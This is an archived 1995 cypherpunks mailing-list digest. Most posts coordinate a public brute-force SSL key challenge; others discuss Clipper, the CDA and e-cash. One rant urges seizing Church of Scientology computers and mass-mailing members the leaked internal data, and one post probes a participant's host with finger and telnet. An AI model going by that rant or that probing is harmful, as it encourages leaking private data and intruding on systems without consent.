Date: Thu, 24 Aug 95 09:21:07 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Spooks and Hackers, etc.
In-Reply-To: <Pine.SOL.3.91.950819210419.18364G-100000@use.usit.net>
Message-ID: <9508241620.AA13830@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan writes
>"We need to see that police are surfing the Internet just as other people
>are," Doyle said. "This is a good example of where the law is slower than
>technology."

Duh!  Isn't the law *supposed* to be slower than technology?  It would
take a *complete* idiot to try to make a law about, say, intelligent
programs or uploads or whatever.  It's when law wants to be *faster*
than technology that we get stupidity like the CDA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 24 Aug 95 08:28:46 PDT
To: cypherpunks@toad.com
Subject: Re: Let Me Repeat, the Raids Must Be Stopped!  A PROFOUND THREAT TO FREEDOM OF SPEECH ON THE INTERNET
In-Reply-To: <199508231002.DAA03500@infinity.c2.org>
Message-ID: <9508241527.AA06465@all.net>
MIME-Version: 1.0
Content-Type: text


Begin RANT

It seems to me that the cure to the scientology situation is to get TROs
claiming that they have your copyrighted material and seize their
computers for your examination and removal, file law suits in each of
the venues against the CoS and each of the individuals (jointly and
severally) in each venue, publishing all information on the servers
containing it via anonymous remailers (from accounts gotten free via
Compuserve, AOL, delphi, etc.  and/or paid for with cash) to mailing
lists all over the world, getting the entire contents placed on-line in
a country that doesn't enforce copyright restrictions and get pointers
to it from all over the web, send massive email to all church members
(the list gleaned from their computers) giving them all the details of
the internal church financial dealings, and on and on.

end RANT

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 24 Aug 95 08:44:09 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
Message-ID: <199508241543.LAA07735@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:16 PM 8/23/95 +0100, aba@atlas.ex.ac.uk wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>
>[a copy of final announce, start time 18:00 GMT, tomorrow (Thu), as
>posted to a list of USENET groups]


Is that really 1800 GMT or 1800 BST?  1400 or 1300 hrs EDT?

I'm ready to hurl my 7800 keys/sec 486/66 into the fray.  I should be able
to do about 24 segments over 12 hours tonight using brutessl.exe 1.02 for
DOS.  Maybe I should have been in line at Midnight to get WIN/95 so I could
run it automatically.

The 32-bit Windows version does *not* work with my old Windows 3.11 even
with the latest Microsoft 32-bit add in.


DCF

"No Ossifer, I'm not smoking.  I'm burning this tobacco in protest against
the fascistic policies of the Food and Drug Administration." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 24 Aug 95 08:51:03 PDT
To: cypherpunks@toad.com
Subject: Re: Let Me Repeat, the Raids Must Be Stopped! A PROFOUND THREAT TO  FREEDOM OF SPEECH ON THE INTERNET
In-Reply-To: <9508241527.AA06465@all.net>
Message-ID: <9508241549.AA23185@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I think its simpler than that, a judge simply needs to look at the facts of the 
case, declare the warrants to be void, order the property returned and require 
payment of the 4.7 Million to Wollerstein before the courts will consider the 
matter further.

The problem seems to be that the US courts don't have the balls to deal with this 
type of behaviour.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@eskimo.com>
Date: Thu, 24 Aug 95 12:36:21 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Brute SSL Challenge
In-Reply-To: <9157.9508240731@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.91.950824122951.12822D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995 aba@atlas.ex.ac.uk wrote:

> You wouldn't happen to have gcc under DOS would you?
> 
> Or anyone else with djgcc for DOS?
> 
> What would be really nice would be a 32 bit DOS executable, which is
> very hard to obtain with any PC software, and compiling it 16 bit
> suffers a huge performance hit.
> 
> In search of a 32 bit DOS binary,

  In the same vein, a 32 bit OS2 version would be nice.

  I'm not sure how brutessl works exactly, but if it could connect to the 
server, get its key assignments, and then chug away while disconnected 
from the net I could see what kind of speed I get out of my 40MHz 486.

   Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 12:33:51 PDT
To: cypherpunks@toad.com
Subject: Matt Blaze's paper on Clipper...
Message-ID: <199508241933.MAA21565@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

I don't seem to be able to locate it, but I had it earlier on.
Do anyone know where it is?

I'm talking to a reporter about the EPIC alert, and wants to show
him Matt's attack.

/Christian W




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Thu, 24 Aug 95 10:40:33 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Linux brutessl client
In-Reply-To: <9508241712.AA15565@cantina.verity.com>
Message-ID: <Pine.SOL.3.91.950824123643.26720F-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Patrick Horgan wrote:

> <snicker> I only get 5900 keys/second on a SPARCstation 5:)

My SPARC 5 does 9600 :(  However, I have to run it on a 386DX 33 that 
only gets 1400 :{

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 23 Aug 95 19:43:22 PDT
To: stevenw@iglou.com (Steven Weller)
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <v01520d06ac6060379f25@[199.171.88.71]>
Message-ID: <199508240241.MAA07578@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello rah@shipwright.com (Robert Hettinga)
  and stevenw@iglou.com (Steven Weller)
  and cypherpunks@toad.com

[certificates have their own inherent worth etc]

> In such a system, where does credit come in? If I have a certificate that
> is worth X, then does the recipient know that it's from my "credit card"?
> How do I obtain credit, and in what form does it exist?

There's no reason for the recipient to know it's from your credit card.
You simply obtain cash from your bank as a loan and then give it to
the recipient.

If you want to provide the convenience of CC (ie avoid having to go to
the ATM first), you could allow wallets to communicate with the bank
via the merchant's equipment, in effect building an ATM into every 
point-of-sale terminal.

wallet via merchant to bank: withdraw X from account Y
bank via merchant to wallet: here is X in e-cash
wallet to merchant: here is X in e-cash

If you do not wish the bank to know which merchant it was, you could send
it via an anonymizing service or two.

> Furthermore, how do we assess the value of real physical things in a system
> like this?

Well, same as in any other system: "how much are you willing to give me
for this?"

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 24 Aug 95 10:58:45 PDT
To: cypherpunks@toad.com
Subject: brutessl client
Message-ID: <199508241809.NAA06774@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, my 386SX-33 (w/FPU) is doing about 1000/sec, my Compaq Deskpro386/20e
(w/fpu) is doing 1000/s, and my 486DX2-80 is doing 8100/s.

The two 386 machines will be working on it full time, the 486 will be
time-slicing with 'real work'.

Now all I need is some keyspace :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 24 Aug 95 10:20:17 PDT
To: Scott Brickner <cypherpunks@toad.com
Subject: Re: Spooks and Hackers, etc.
In-Reply-To: <9508241620.AA13830@ozymandias.austin.ibm.com>
Message-ID: <9508241718.AA23321@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Brad Dolan writes
>>"We need to see that police are surfing the Internet just as other people
>>are," Doyle said. "This is a good example of where the law is slower than
>>technology."

>Duh!  Isn't the law *supposed* to be slower than technology?  It would
>take a *complete* idiot to try to make a law about, say, intelligent
>programs or uploads or whatever.  It's when law wants to be *faster*
>than technology that we get stupidity like the CDA.

I'm somewhat suprised that a police force would be talking in these terms, in 
the UK the police have been looking at USEnet et al for over a decade.


I don't think the CDA has anything to do with the law keeping up, its the 
opposite. Its about cynical and unscrupulous politicians using public ignorance 
to portray themselves as the saviours of society. First create a straw man then 
fight it.


All the net is doing is exposing the weakness of the press. Events like the 
cyberporn scandal simply illustrate the normal modus-operandi, they are not 
abberations caused by `poor journalism'. It is worth reading Chomsky's analysis 
of the press. If one excludes the anti-establishment attacks the underlying 
thesis is consistent with observation. The established press is not pro-active 
but reactive, it does not seek to inform but to entertain. Facts are checked for 
acceptability and plausibility rather than for accurracy.

It is here that the most potent effects of the Web will be found. There is now 
an international normative infrastructure. It is much harder for a political 
system to sustain a stocoma. Consider, Lybia is accussed of involvement in the 
Pan Am/Lockerbie bombing, despite the fact that the evidence is tenuous and that 
the US was until recently accusing Syria of having authored the crime there is a 
call for international sactions. On the other hand it is the tenth aniversary of 
the sinking of the Rainbow Warrior and the murder of one of its crew by the 
French Secret service. Far from appologising for this crime and imprisoning 
those responsible France has even decorated one of the murderers.

Consider also the insistence on the Japanese appologising for World War II 
despite the lack of an equivalent appology by the British for their imperial 
conquests or the US for their attack on Vietnam.

Exposing the international nature of attrocity weakens its power to coerce a 
population into externalising conflict. It is scarcely controvertial that were 
the true facts of the Iraqui invasion of Kewait to be generally known the Iraqui 
population would have considerably less support for Saddam. 

International communication will weaken nationalist ties and isolationism. It 
will no longer be possible to present issues in the same moral famework, ie a 
frameworkin which "right" is automatically equated with self-interest.


		Phill H-B








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Thu, 24 Aug 95 04:54:28 PDT
To: poodge@econ.Berkeley.EDU (Sam Quigley)
Subject: Re: Linux brutessl client
In-Reply-To: <199508240448.VAA12304@quesnay.Berkeley.EDU>
Message-ID: <m0slaeI-000PZbC@bofh.lake.de>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Thu, 24 Aug 95 11:04:39 PDT
To: David Taffs <dat@ebt.com>
Subject: Re: The End of the Ecash Trial?
In-Reply-To: <199508231635.MAA07961@mummy.cis.ohio-state.edu>
Message-ID: <199508241803.OAA25715@brain.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Taffs writes:
 > Will there be a collectors market for c$? Does Chaumian cash work
 > as collectable antiques?

Not if no authority exists to certify that your coins are
unspent. Otherwise, I can just keep trading my coins back and forth to
Digicash and saving copies of the used ones.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel C. Cotey" <dccotey@zonev.uccs.edu>
Date: Thu, 24 Aug 95 13:04:38 PDT
To: cypherpunks@toad.com
Subject: WinNT or Linux for SSL challenge ?
Message-ID: <Pine.ULT.3.90.950824140055.21474A-100000@zonev>
MIME-Version: 1.0
Content-Type: text/plain



	I have a pentium 90 that will be set up to dual boot WinNT 3.5 server
and linux 1.2.8, is one of them significantly faster ?

---                                                                         ---
 Daniel Cotey	   					 dccotey@serf.uccs.edu
				                      dccotey@ecepc44.uccs.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harry@starbase.sj.unisys.com
Date: Thu, 24 Aug 1995 14:13:59 -0700 (PDT)
To: lile@art.net (Lile Elam)
Subject: EPIC states FBI files concluded that Clipper must be mandatory (fwd)
Message-ID: <14a48a4c397df5b0c3596bf2e659c3c3@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded-by: bostic@bsdi.com (Keith Bostic)
Forwarded-by: Wendell Craig Baker <wbaker@splat.baker.com>

FOR RELEASE:  August 16, 1995, 2:00 p.m. EST

CONTACT: David Sobel (202) 544-9240

               FBI FILES: CLIPPER MUST BE MANDATORY


	WASHINGTON, DC - Newly-released government documents show 
that key federal agencies concluded more than two years ago that 
the "Clipper Chip" encryption initiative will only succeed if 
alternative security techniques are outlawed.  The Electronic 
Privacy Information Center (EPIC) obtained the documents from the 
Federal Bureau of Investigation under the Freedom of Information 
Act.  EPIC, a non-profit research group, received hundreds of 
pages of material from FBI files concerning Clipper and 
cryptography.

	The conclusions contained in the documents appear to conflict 
with frequent Administration claims that use of Clipper technology 
will remain "voluntary."  Critics of the government's initiative, 
including EPIC, have long maintained that the Clipper "key-escrow 
encryption" technique would only serve its stated purpose if made 
mandatory.  According to the FBI documents, that view is shared by 
the Bureau, the National Security Agency (NSA) and the Department 
of Justice (DOJ).

	In a "briefing document" titled "Encryption: The Threat, 
Applications and Potential Solutions," and sent to the National 
Security Council in February 1993, the FBI, NSA and DOJ concluded 
that:

     Technical solutions, such as they are, will only work if 
     they are incorporated into *all* encryption products.  
     To ensure that this occurs, legislation mandating the 
     use of Government-approved encryption products or 
     adherence to Government encryption criteria is required.

	Likewise, an undated FBI report titled "Impact of Emerging 
Telecommunications Technologies on Law Enforcement" observes that 
"[a]lthough the export of encryption products by the United States 
is controlled, domestic use is not regulated."  The report 
concludes that "a national policy embodied in legislation is 
needed."  Such a policy, according to the FBI, must ensure "real-
time decryption by law enforcement" and "prohibit[] cryptography 
that cannot meet the Government standard."

	The FBI conclusions stand in stark contrast to public 
assurances that the government does not intend to prohibit the use 
of non-escrowed encryption.  Testifying before a Senate Judiciary 
Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
Harris asserted that:

     As the Administration has made clear on a number of 
     occasions, the key-escrow encryption initiative is a 
     voluntary one; we have absolutely no intention of 
     mandating private use of a particular kind of 
     cryptography, nor of criminalizing the private use of 
     certain kinds of cryptography.

 	According to EPIC Legal Counsel David Sobel, the newly-
disclosed information "demonstrates that the architects of the 
Clipper program -- NSA and the FBI -- have always recognized that 
key-escrow must eventually be mandated.  As privacy advocates and 
industry have always said, Clipper does nothing for law 
enforcement unless the alternatives are outlawed."

	Scanned images of several key documents are available via the 
World Wide Web at the EPIC Home Page:

		http://www.epic.org/crypto/ban/fbi_dox/
                              -30-
_________________________________________________________________________
Subject: FBI Files on Clipper Released
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 14:17:09 PDT
To: trei@process.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <9508242051.AA13777@toad.com>
Message-ID: <199508242116.OAA23923@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| I've been looking at the allocated list of keys, and I notice a possible 
| problem:  One user has allocated 50,000 segements:

Where can one observe the progress of the computations? What is 
allocated etc?

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Thu, 24 Aug 95 14:46:48 PDT
To: trei@process.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <9508242051.AA13777@toad.com>
Message-ID: <199508242146.OAA13613@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Peter" == Peter Trei <trei@process.com> writes:

    > I've been looking at the allocated list of keys, and I notice a
    > possible problem: One user has allocated 50,000 segements:

    > 0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>

    > Now, it's possible this fellow has some vast farm of high-speed
    > workstations, but I doubt it.  Finger suggests that this is a
    > linux box. [...]

Finger reports that it is indeed a linux (1.2.9) box with a low load
average (0.00, 0.00, 0.00 right now), but that Mr. Thomas is on from
nemesis.ogi.com.

nemesis refuses finger, telnet, and ftp connections, but, on WWW
connect, asks for a userid and password for the "Marcam Development
WWW site at nemesis.ogi.com."

Marcam (http://www.marcam.com) makes something to do with computers,
so Mr. Thomas could well have a bunch of computers at his
disposal... (Even so, 50000 is a big number)

I can't actually figure out what, specifically, Marcam makes.  They
produce applications which reduce costs, increase flexibility, and the
whole shebang... but nowhere does it say what the programs *do*...

Smells like an NSA front.

-sq :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Thu, 24 Aug 95 14:51:20 PDT
To: cwe@Csli.Stanford.EDU
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <199508242116.OAA23923@Csli.Stanford.EDU>
Message-ID: <199508242151.OAA13622@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Christian" == Christian Wettergren <cwe@Csli.Stanford.EDU> writes:

    > Where can one observe the progress of the computations? What is
    > allocated etc?

try http://www.brute.cl.cam.ac.uk/cgi-bin/brute?op=stats

How often is this updated?  I've allocated (and ACKed) more keyspace
than it shows I have, and I wonder if my requests might have gotten
munged.  So far, the only thing it shows I've acked is the keyspace I
manually ACKed over the WWW interface (actually, I ACKed it a bunch of
times -- the forms weren't producing responses, so I resent them a
couple times..)

-sq






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Thu, 24 Aug 95 11:56:46 PDT
To: aba@atlas.ex.ac.uk
Subject: SSL CHALLENGE:  Can't search with Win32 client!
In-Reply-To: <11274.9508241443@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.91.950824144329.9284B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I've got some keyspace, from various projects and test projects on the 
server, but no matter what key range I select, I can't get the Search 
button to be active (not greyed out).

Anybody else getting this?

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Thu, 24 Aug 95 15:08:01 PDT
To: mkl@nw.com
Subject: EPIC states FBI files concluded that Clipper must be mandatory (fwd)
Message-ID: <199508242205.PAA05087@art.net>
MIME-Version: 1.0
Content-Type: text/plain


This was interesting...

----- Begin Included Message -----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 24 Aug 95 13:08:11 PDT
To: cypherpunks@toad.com
Subject: SSLbrute progress.
Message-ID: <9508242007.AA19900@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Thu Aug 24 20:02:47 GMT 1995

Two hours into it, and the key numbers that brclient is returning
show about 5% allocated already....  That brings this to closure
in around 24 hours - 12hours for 1/2 the space.

Although - I also just checked the status, and it doesn't seem to be up to
date with the keys I am getting, and it doesn't show any that it
does have under my name as being acked.  This could be just a delay
thing I guess, but it could also be that I just updated brloop
and brclient to the latest versions.

Has anyone else thought of putting Damien's slave code that 
checks for idle tty's, etc into brutessl?

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 24 Aug 95 15:13:34 PDT
To: cypherpunks@toad.com
Subject: Brutesslos2.exe won't run
Message-ID: <199508242211.PAA31692@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Trying to run brutesslos2.exe on my OS/2 box, I get:

SYS1804:  The system cannot find the file EMX
-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 15:14:53 PDT
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: server congestion?
Message-ID: <199508242214.PAA25424@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Couldn't one take advantage of the 50.000 mistake, by
setting up a second server for that space. I guess 
things will screw up when the first server reaches 
FFFF, as indicated earlier.

What would be nice is if one could divide up the key
between servers also.

Another thing that might decrease the load on the server
is if we start allocating more blocks at a time, lets
say 2-4 blocks each time. Wouldn't that help?

/Christian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 15:16:45 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <Pine.3.89.9508250018.A1207-0100000@digit.ee>
Message-ID: <199508242215.PAA25512@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| BTW how can I log brloop's output into a file and not to the screen?

#!/bin/sh
brloop > /tmp/worklog.ssl 2>&1 &

is what I did.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt7508b@prism.gatech.edu (PHrEaK!)
Date: Thu, 24 Aug 95 12:22:50 PDT
To: cypherpunks@toad.com
Subject: PGPfone Release is coming soon! (fwd)
Message-ID: <199508241922.PAA20604@acmex.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> As you may have seen, the news media has picked up on the upcoming
> PGPfone release. This note is to let you know that we at MIT are working
> with Phil Zimmermann and the PGPfone team to distribute PGPfone from
> MIT. We expect to have a *BETA* test version (Macintosh Only) of PGPfone
> available shortly.
Is there a unix version planned???

-- 
=-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=-
-=-=-=-=-=- TWN615@mindvox.phantom.com  GT7508B@prism.gatech.edu =-=-=-=-=-=-=
=- "Government is not a reason, not an eloquence; it is a force. Like fire, =-
-=- it is a dangerous servant and a fearful master." -- George Washington -=-=



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 24 Aug 95 12:38:06 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: SSL CHALLENGE:  Can't search with Win32 client!
Message-ID: <9508241937.AA10860@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> I've got some keyspace, from various projects and test projects on the 
> server, but no matter what key range I select, I can't get the Search 
> button to be active (not greyed out).

> Anybody else getting this?

> Joe

I did. If you look at 'properties' you'll probably find the data  needs 
updating. click up 'update' to do this. It now seems to be working form 
me.

Now if only I could get the 'search status' window to tell me something...



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 07:44:17 PDT
To: cypherpunks@toad.com
Subject: SSL CHALLENGE: 3 hours to go...
Message-ID: <11274.9508241443@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



The start time for the kick off on the race to crack Hal's 2nd
challenge is fast approaching...

	18:00 GMT

That's only a little over 3 hours away.  Please start your brloop
clients if you have not already.  Chuck in any net connected unix
boxes, never mind how old or slow, they'll still help.  Be ready with
the WWW interface at 18:00 GMT if you don't have direct IP.  The
client runs the brute forcer at nice -20, so it shouldn't interfere
with users.

All code, and step by step instructions for setup on:

	http://www.brute.cl.cam.ac.uk/brute/
or	ftp://ftp.brute.cl.cam.ac.uk/pub/brute/

Binaries available for DOS, Windows 95/NT, generic C code for unix &
others.  Please run the socket code if you can, it'll provide best
utilisation, and least work for you.

May the race being...

The c$ prize fund has reached c$ 342.30, and the more compute you
personally contribute the greater chance you have of winning it :-)

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Thu, 24 Aug 95 16:01:39 PDT
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Subject: Re: server congestion?
In-Reply-To: <199508242214.PAA25424@Csli.Stanford.EDU>
Message-ID: <199508242301.QAA29944@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text


> 
> Another thing that might decrease the load on the server
> is if we start allocating more blocks at a time, lets
> say 2-4 blocks each time. Wouldn't that help?
> 

I've been trying to report via WWW for almost 20 minutes...

Yikes!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: duncan@hasp.com (Duncan J Watson)
Date: Thu, 24 Aug 95 13:00:00 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE:  Can't search with Win32 client!
In-Reply-To: <9508241937.AA10860@toad.com>
Message-ID: <9508241604.ZM99@titan.hasp.com>
MIME-Version: 1.0
Content-Type: text/plain


The process seems to be from our admittedly thick-fingered experimentation to 
be as follows:
1) start the client
2) insert the server in the server edit box "sksp.brute.cl.cam.ac.uk"
3) put 19957 in the port edit box
4) push the update button.
5) Select Hal Finney's  SSL 2nd Challenge from the drop box
6) Push the update button again
7) request a small number of key segments (1-10)
8) Select the returned keys and then push the Search button
9) Fill out the dialog box and let the search proceed.

At this point your computer is checking keys.
To view the progress Select options from the menu 
            the select view searches...
You will see the progress in a seperate dialog box.
This is my understanding.  
YMMV
djw

On Aug 24,  3:40pm, Peter Trei wrote:
> Subject: Re: SSL CHALLENGE:  Can't search with Win32 client!
>  
> > I've got some keyspace, from various projects and test projects on the 
> > server, but no matter what key range I select, I can't get the Search 
> > button to be active (not greyed out).
> 
> > Anybody else getting this?
> 
> > Joe
> 
> I did. If you look at 'properties' you'll probably find the data  needs 
> updating. click up 'update' to do this. It now seems to be working form 
> me.
> 
> Now if only I could get the 'search status' window to tell me something...
> 
> 
> 
> Peter Trei




-- 
Duncan J Watson                            Email:Duncan@hasp.com
Tech Support Manager/Sys Admin             Ph#:  +1 212 564 5678
Aladdin Software Security Inc              Fax#: +1 212 564 3377
:::finger Duncan@hasp.com for PGP key:::   http://www.hasp.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jered@MIT.EDU
Date: Thu, 24 Aug 95 13:05:36 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE: 0.11 borken?
Message-ID: <199508242005.QAA03863@narn.atype.com>
MIME-Version: 1.0
Content-Type: text/plain



   I had several machines running brloop 0.03 and brclient 0.11, and
none of them appeared to be sending ACKs back to the server.  Is this
a known problem? It might account for the large number of unACKed
keyspaces.

  brloop 0.04 and brclient 0.12 seem to work well, however.

--Jered
jered@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Klaus <cklaus@iss.net>
Date: Fri, 25 Aug 95 18:31:24 PDT
To: cypherpunks@toad.com
Subject: Security Mailing Lists
Message-ID: <199508250052.RAA02427@iss.net>
MIME-Version: 1.0
Content-Type: text/plain




This was put together to hopefully promote greater awareness of the security
lists that already exist.  Most security mailing lists have been only
announced once and it was only word of mouth that it would acquire new
members.  This list should hopefully make the membership grow for each
mailing list.

If you know of any mailing lists that have been skipped, please e-mail
cklaus@iss.net with the info. 

The newest updates for this will be on http://iss.net/.  This web site
also contains info for the following security issues:

	Vendor security contacts
	Security Patches
	What to do if you are compromised
	Set up Anon ftp securely
	Sniffers attacks and solutions


	
Security Mailing Lists

The following FAQ is a comprehensive list of security mailing lists. These
security mailing lists are important tools to network administrators, network
security officers, security consultants, and anyone who needs to keep abreast
of the most current security information available.

General Security Lists

   *  8lgm (Eight Little Green Men)
   *  Academic-Firewalls
   *  Best of Security
   *  Bugtraq
   *  Computer Privacy Digest (CPD)
   *  Computer Underground Digest (CuD)
   *  Cypherpunks
   *  Cypherpunks-Announce
   *  Firewalls
   *  Intruder Detection Systems
   *  Phrack
   *  PRIVACY Forum
   *  Risks
   *  Sneakers
   *  Virus
   *  Virus Alert

Security Products

   *  Tiger
   *  TIS Firewallk Toolkit

Vendors and Organizations

   *  CERT
   *  CIAC
   *  HP
   *  Sun

-------------------------------------------------------------------------------

8lgm (Eight Little Green Men)

To join, send e-mail to majordomo@8lgm.org and, in the text of your message
(not the subject line), write:

     subscribe 8lgm-list

Group of hackers that periodically post exploit scripts for various Unix bugs.

-------------------------------------------------------------------------------

Academic Firewalls

To join, send e-mail to majordomo@net.tamu.edu and, in the text of your message
(not the subject line), write:

     SUBSCRIBE Academic-Firewalls

This is an unmoderated list maintained by Texas A&M University. Its purpose is
to promote the discussion and use of firewalls and other security tools in an
